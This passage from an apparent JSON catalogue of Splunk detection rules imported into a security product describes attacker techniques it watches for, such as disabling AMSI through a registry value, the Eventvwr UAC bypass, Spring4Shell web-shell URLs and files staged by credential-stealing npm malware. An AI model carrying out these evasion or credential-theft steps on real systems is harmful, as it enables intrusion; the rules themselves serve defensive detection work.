If confirmed malicious, this behavior could lead to widespread data encryption, rendering files inaccessible and potentially causing significant operational disruption and data loss.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-security-and-backup-services-stop.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9c24aef6-cad9-4931-acce-74318aa5663b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_security_and_backup_services_stop.yml" } }, { "id": "splunk-security-content-9c2620a8-94a1-11ec-b40c-acde48001122", "type": "detection", "name": "Windows Event For Service Disabled", "description": "The following analytic detects when a Windows service is modified from a start type to disabled. It leverages system event logs, specifically EventCode 7040, to identify this change. This activity is significant because adversaries often disable security or other critical services to evade detection and maintain control over a compromised host. 
If confirmed malicious, this action could allow attackers to bypass security defenses, leading to further exploitation and persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-event-for-service-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9c2620a8-94a1-11ec-b40c-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_event_for_service_disabled.yml" } }, { "id": "splunk-security-content-9c27ec42-d338-11eb-9044-acde48001122", "type": "detection", "name": "Disable AMSI Through Registry", "description": "The following analytic detects modifications to the Windows registry that disable the Antimalware Scan Interface (AMSI) by setting the \"AmsiEnable\" value to \"0x00000000\". This detection leverages data from the Endpoint.Registry data model, specifically monitoring changes to the registry path \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows Script\\\\Settings\\\\AmsiEnable\". Disabling AMSI is significant as it is a common technique used by ransomware, Remote Access Trojans (RATs), and Advanced Persistent Threats (APTs) to evade detection and impair defenses. 
If confirmed malicious, this activity could allow attackers to execute payloads with minimal alerts, leading to potential system compromise and data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/disable-amsi-through-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9c27ec42-d338-11eb-9044-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/disable_amsi_through_registry.yml" } }, { "id": "splunk-security-content-9c5e3d62-f743-11ee-9f6e-acde48001124", "type": "detection", "name": "AWS Bedrock Delete Model Invocation Logging Configuration", "description": "The following analytic identifies attempts to delete AWS Bedrock model invocation logging configurations. It leverages AWS CloudTrail logs to detect when a user or service calls the DeleteModelInvocationLogging API. This activity is significant as it may indicate an adversary attempting to remove audit trails of model interactions after compromising credentials. Deleting model invocation logs could allow attackers to interact with AI models without leaving traces, potentially enabling them to conduct data exfiltration, prompt injection attacks, or other malicious activities without detection. 
If confirmed malicious, this could represent a deliberate attempt to hide unauthorized model usage and evade detection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-bedrock-delete-model-invocation-logging-configuration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9c5e3d62-f743-11ee-9f6e-acde48001124", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_bedrock_delete_model_invocation_logging_configuration.yml" } }, { "id": "splunk-security-content-9c8e4f2a-7d3b-4e5c-8a9f-1b6d4e8c3f5a", "type": "detection", "name": "Cisco ASA - New Local User Account Created", "description": "This analytic detects creation of new user accounts on Cisco ASA devices via CLI or ASDM.\nAdversaries may create unauthorized user accounts to establish persistence, maintain backdoor access, or elevate privileges on network infrastructure devices. 
These rogue accounts can provide attackers with continued access even after initial compromise vectors are remediated.\nThe detection monitors for ASA message ID 502101, which is generated whenever a new user account is created on the device, capturing details including the username, privilege level, and the administrator who created the account.\nInvestigate unexpected account creations, especially those with elevated privileges (level 15), accounts created outside business hours, accounts with suspicious or generic names, or accounts created by non-administrative users.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.001", "T1078.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-asa-new-local-user-account-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9c8e4f2a-7d3b-4e5c-8a9f-1b6d4e8c3f5a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/cisco_asa___new_local_user_account_created.yml" } }, { "id": "splunk-security-content-9c94732a-61af-11ec-91e3-acde48001122", "type": "detection", "name": "Linux Possible Append Command To Profile Config File", "description": "The following analytic detects suspicious command-lines that modify user profile files to automatically execute scripts or executables upon system reboot. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions involving profile files like ~/.bashrc and /etc/profile. 
This activity is significant as it indicates potential persistence mechanisms used by adversaries to maintain access to compromised hosts. If confirmed malicious, this could allow attackers to execute arbitrary code upon reboot, leading to persistent control over the system and potential further exploitation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-possible-append-command-to-profile-config-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9c94732a-61af-11ec-91e3-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_possible_append_command_to_profile_config_file.yml" } }, { "id": "splunk-security-content-9cd6d066-94d5-4ccd-a8b9-28c03ca91be8", "type": "detection", "name": "Detect Large ICMP Traffic", "description": "The following analytic identifies ICMP traffic to external IP addresses with total bytes (sum of bytes in and bytes out) greater than 1,000 bytes.\nIt leverages the Network_Traffic data model to detect large ICMP packets that aren't blocked and are directed toward external networks. 
We use All_Traffic.bytes in the detection to capture variations in inbound versus outbound traffic sizes, as significant discrepancies or unusually large ICMP exchanges can indicate information smuggling, covert communication, or command-and-control (C2) activities.\nIf validated as malicious, this could signal ICMP tunneling, unauthorized data transfer, or compromised endpoints requiring immediate investigation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1095" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-large-icmp-traffic.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9cd6d066-94d5-4ccd-a8b9-28c03ca91be8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/detect_large_icmp_traffic.yml" } }, { "id": "splunk-security-content-9cf8fe08-7ad8-11eb-9819-acde48001122", "type": "detection", "name": "Eventvwr UAC Bypass", "description": "The following analytic detects an Eventvwr UAC bypass by identifying suspicious registry modifications in the path that Eventvwr.msc references upon execution. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on registry changes and process execution details. This activity is significant because it indicates a potential privilege escalation attempt, allowing an attacker to execute arbitrary commands with elevated privileges. 
If confirmed malicious, this could lead to unauthorized code execution, persistence, and further compromise of the affected system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/eventvwr-uac-bypass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9cf8fe08-7ad8-11eb-9819-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/eventvwr_uac_bypass.yml" } }, { "id": "splunk-security-content-9d22a780-5165-11ec-ad4f-3e22fbd008af", "type": "detection", "name": "Randomly Generated Scheduled Task Name", "description": "The following analytic detects the creation of a Scheduled Task with a high entropy, randomly generated name, leveraging Event ID 4698. It uses the `ut_shannon` function from the URL ToolBox Splunk application to measure the entropy of the Task Name. This activity is significant as adversaries often use randomly named Scheduled Tasks for lateral movement and remote code execution, employing tools like Impacket or CrackMapExec. 
If confirmed malicious, this could allow attackers to execute arbitrary code remotely, potentially leading to further compromise and persistence within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/randomly-generated-scheduled-task-name.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9d22a780-5165-11ec-ad4f-3e22fbd008af", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/randomly_generated_scheduled_task_name.yml" } }, { "id": "splunk-security-content-9d44d649-7d67-4559-95c1-8022ff49420b", "type": "detection", "name": "Spring4Shell Payload URL Request", "description": "The following analytic detects attempts to exploit the Spring4Shell vulnerability (CVE-2022-22963) by identifying specific URL patterns associated with web shell payloads. It leverages web traffic data, focusing on HTTP GET requests with URLs containing indicators like \"tomcatwar.jsp,\" \"poc.jsp,\" and \"shell.jsp.\" This activity is significant as it suggests an attacker is trying to deploy a web shell, which can lead to remote code execution. 
If confirmed malicious, this could allow the attacker to gain persistent access, execute arbitrary commands, and potentially escalate privileges within the compromised environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1133", "T1190", "T1505.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/spring4shell-payload-url-request.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9d44d649-7d67-4559-95c1-8022ff49420b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/spring4shell_payload_url_request.yml" } }, { "id": "splunk-security-content-9d4fea43-9182-4c5a-ada8-13701fd5615d", "type": "detection", "name": "Azure AD Admin Consent Bypassed by Service Principal", "description": "The following analytic identifies instances where a service principal in Azure Active Directory assigns app roles without standard admin consent. It uses Entra ID logs from the `azure_monitor_aad` data source, focusing on the \"Add app role assignment to service principal\" operation. This detection is significant as it highlights potential bypasses of critical administrative consent processes, which could lead to unauthorized privileges being granted. 
If confirmed malicious, this activity could allow attackers to exploit automation to assign sensitive permissions without proper oversight, potentially compromising the security of the Azure AD environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-admin-consent-bypassed-by-service-principal.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9d4fea43-9182-4c5a-ada8-13701fd5615d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_admin_consent_bypassed_by_service_principal.yml" } }, { "id": "splunk-security-content-9d680775-84a6-4625-a8ea-8182b9427ce4", "type": "detection", "name": "MacOS Kextload Usage", "description": "Detects execution of the kextload command on macOS systems. 
The kextload utility is used to manually load kernel extensions (KEXTs) into the macOS kernel, which can introduce privileged code at the kernel level.\nWhile legitimate for driver installation and system administration, misuse may indicate attempts to install unauthorized, malicious, or persistence-enabling kernel extensions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_migrated", "mitre_techniques": [ "T1543" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_migrated/macos-kextload-usage.yaml", "provenance": { "source": "splunk/security_content", "source_id": "9d680775-84a6-4625-a8ea-8182b9427ce4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/macos_kextload_usage.yml" } }, { "id": "splunk-security-content-9d867448-2aff-4d07-876c-89409a752ff8", "type": "detection", "name": "Linux High Frequency Of File Deletion In Etc Folder", "description": "The following analytic detects a high frequency of file deletions in the /etc/ folder on Linux systems. It leverages the Endpoint.Filesystem data model to identify instances where 200 or more files are deleted within an hour, grouped by process name and process ID. This behavior is significant as it may indicate the presence of wiper malware, such as AcidRain, which aims to delete critical system files. 
If confirmed malicious, this activity could lead to severe system instability, data loss, and potential disruption of services.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.004", "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-high-frequency-of-file-deletion-in-etc-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9d867448-2aff-4d07-876c-89409a752ff8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_high_frequency_of_file_deletion_in_etc_folder.yml" } }, { "id": "splunk-security-content-9d8f6e3f-39df-46d8-a9d4-96173edc501f", "type": "detection", "name": "Kubernetes Anomalous Inbound to Outbound Network IO Ratio", "description": "The following analytic identifies significant changes in network communication behavior within Kubernetes containers by examining the inbound to outbound network IO ratios. It leverages process metrics from an OTEL collector and Kubelet Stats Receiver, along with data from Splunk Observability Cloud. Anomalies are detected using a lookup table containing average and standard deviation values for network IO, triggering an event if the anomaly persists for over an hour. This activity is significant as it may indicate data exfiltration, command and control communication, or compromised container behavior. 
If confirmed malicious, it could lead to data breaches, service outages, and unauthorized access within the Kubernetes cluster.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-anomalous-inbound-to-outbound-network-io-ratio.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9d8f6e3f-39df-46d8-a9d4-96173edc501f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_anomalous_inbound_to_outbound_network_io_ratio.yml" } }, { "id": "splunk-security-content-9d911ce0-c3be-11eb-b177-acde48001122", "type": "detection", "name": "Wbemprox COM Object Execution", "description": "The following analytic detects a suspicious process loading a COM object from wbemprox.dll, fastprox.dll, or wbemcomn.dll. It leverages Sysmon EventCode 7 to identify instances where these DLLs are loaded by processes not typically associated with them, excluding known legitimate processes and directories. This activity is significant as it may indicate an attempt by threat actors to abuse COM objects for privilege escalation or evasion of detection mechanisms. 
If confirmed malicious, this could allow attackers to gain elevated privileges or maintain persistence within the environment, posing a significant security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/wbemprox-com-object-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9d911ce0-c3be-11eb-b177-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/wbemprox_com_object_execution.yml" } }, { "id": "splunk-security-content-9d96022e-6250-11ec-9a19-acde48001122", "type": "detection", "name": "Linux Setuid Using Setcap Utility", "description": "The following analytic detects the execution of the 'setcap' utility to enable the SUID bit on Linux systems. It leverages Endpoint Detection and Response (EDR) data, focusing on process names and command-line arguments that indicate the use of 'setcap' with specific capabilities. This activity is significant because setting the SUID bit allows a user to temporarily gain root access, posing a substantial security risk. 
If confirmed malicious, an attacker could escalate privileges, execute arbitrary commands with elevated permissions, and potentially compromise the entire system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-setuid-using-setcap-utility.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9d96022e-6250-11ec-9a19-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_setuid_using_setcap_utility.yml" } }, { "id": "splunk-security-content-9db0d5b0-4058-4cb7-baaf-77d8143539a2", "type": "detection", "name": "O365 OAuth App Mailbox Access via Graph API", "description": "The following analytic detects when emails are accessed in Office 365 Exchange via the Microsoft Graph API using the client ID '00000003-0000-0000-c000-000000000000'. It leverages the 'MailItemsAccessed' operation within the Exchange workload, focusing on OAuth-authenticated applications. This activity is significant as unauthorized access to emails can lead to data breaches and information theft. 
If confirmed malicious, attackers could exfiltrate sensitive information, compromise user accounts, and further infiltrate the organization's network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1114.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-oauth-app-mailbox-access-via-graph-api.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9db0d5b0-4058-4cb7-baaf-77d8143539a2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_oauth_app_mailbox_access_via_graph_api.yml" } }, { "id": "splunk-security-content-9ddfe470-c4d0-4e60-8668-7337bd699edd", "type": "detection", "name": "Linux Auditd Clipboard Data Copy", "description": "The following analytic detects the use of the Linux 'xclip' command to copy data from the clipboard. It leverages Linux Auditd telemetry, focusing on process names and command-line arguments related to clipboard operations. This activity is significant because adversaries can exploit clipboard data to capture sensitive information such as passwords or IP addresses. 
If confirmed malicious, this technique could lead to unauthorized data exfiltration, compromising sensitive information and potentially aiding further attacks within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1115" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-clipboard-data-copy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9ddfe470-c4d0-4e60-8668-7337bd699edd", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_clipboard_data_copy.yml" } }, { "id": "splunk-security-content-9e5726fe-8fde-460e-bd74-cddcf6c86113", "type": "detection", "name": "VMware Workspace ONE Freemarker Server-side Template Injection", "description": "The following analytic detects server-side template injection attempts related to CVE-2022-22954 in VMware Workspace ONE.\nIt leverages web or proxy logs to identify HTTP GET requests to the endpoint catalog-portal/ui/oauth/verify with the freemarker.template.utility.Execute command.\nThis activity is significant as it indicates potential exploitation attempts that could lead to remote code execution.\nIf confirmed malicious, an attacker could execute arbitrary commands on the server, leading to full system compromise, data exfiltration, or further lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1133" ], "log_source": null, "playbook": 
null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/vmware-workspace-one-freemarker-server-side-template-injection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9e5726fe-8fde-460e-bd74-cddcf6c86113", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/vmware_workspace_one_freemarker_server_side_template_injection.yml" } }, { "id": "splunk-security-content-9e7bd7c8-1c08-496e-9ffe-fd84ceb322e7", "type": "detection", "name": "Windows Gdrive Binary Activity", "description": "The following analytic detects the execution of the 'gdrive' tool on a Windows host. This tool allows standard users to perform tasks associated with Google Drive via the command line. This is used by actors to stage tools as well as exfiltrate data. The detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. 
If confirmed malicious, this could lead to compromise of systems or sensitive data being stolen.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1567" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-gdrive-binary-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9e7bd7c8-1c08-496e-9ffe-fd84ceb322e7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_gdrive_binary_activity.yml" } }, { "id": "splunk-security-content-9e7d3c0f-4a5b-6c8d-1e2f-3a4b5c6d7e8f", "type": "detection", "name": "Shai-Hulud 2 Exfiltration Artifact Files", "description": "Detects creation of exfiltration artifact files associated with Shai-Hulud 2.0 npm supply\nchain malware. The malware creates cloud.json, contents.json, environment.json, truffleSecrets.json,\nand actionsSecrets.json files containing harvested credentials from AWS, Azure, GCP, GitHub secrets,\nand environment variables. 
These files are staged before being pushed to attacker-controlled repositories.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1074.001", "T1552.001", "T1195.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/shai-hulud-2-exfiltration-artifact-files.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9e7d3c0f-4a5b-6c8d-1e2f-3a4b5c6d7e8f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/shai_hulud_2_exfiltration_artifact_files.yml" } }, { "id": "splunk-security-content-9e995d21-6870-43de-acd9-76f372bcf323", "type": "detection", "name": "Cisco Secure Firewall - Oracle E-Business Suite Correlation", "description": "This correlation rule identifies potential exploitation attempts of Oracle E-Business Suite vulnerabilities (CVE-2025-61882 and CVE-2025-61884) by correlating multiple intrusion signatures from Cisco Secure Firewall Threat Defense logs.\nThe detection looks for specific signatures that indicate attempts to exploit the TemplatePreview functionality and vulnerable SyncServlet endpoints as well as post-compromise activity involving Cl0p.\nBy correlating these signatures, the analytic aims to identify coordinated exploitation attempts that may indicate an attacker is targeting Oracle E-Business Suite installations.\nSecurity teams should investigate any instances of these correlated signatures, especially if they are found in conjunction with other suspicious network activity or on systems that should not be exposed to such threats.", "version": 
"1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-secure-firewall-oracle-e-business-suite-correlation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9e995d21-6870-43de-acd9-76f372bcf323", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___oracle_e_business_suite_correlation.yml" } }, { "id": "splunk-security-content-9e9ab4e3-c9d0-4967-a197-6d755e8a7e6e", "type": "detection", "name": "Windows Scheduled Task with Suspicious Name", "description": "The following analytic detects the creation, modification, or enabling of scheduled tasks with known suspicious or malicious task names. It leverages Windows Security EventCode 4698, 4700, and 4702 to identify when such tasks are registered, modified, or enabled. This activity is significant as it may indicate an attempt to establish persistence or execute malicious commands on a system. 
If confirmed malicious, this could allow an attacker to maintain access, execute arbitrary code, or escalate privileges, posing a severe threat to the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-scheduled-task-with-suspicious-name.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9e9ab4e3-c9d0-4967-a197-6d755e8a7e6e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_scheduled_task_with_suspicious_name.yml" } }, { "id": "splunk-security-content-9ed27cea-4e27-4eff-b2c6-aac9e78a7517", "type": "detection", "name": "Windows Attempt To Stop Security Service", "description": "The following analytic detects attempts to stop security-related services on an endpoint, which may indicate malicious activity. It leverages data from Endpoint Detection and Response (EDR) agents, specifically searching for processes involving the \"sc.exe\" or \"net.exe\" command with the \"stop\" parameter or the PowerShell \"Stop-Service\" cmdlet. This activity is significant because disabling security services can undermine the organization's security posture, potentially leading to unauthorized access, data exfiltration, or further attacks like malware installation or privilege escalation. 
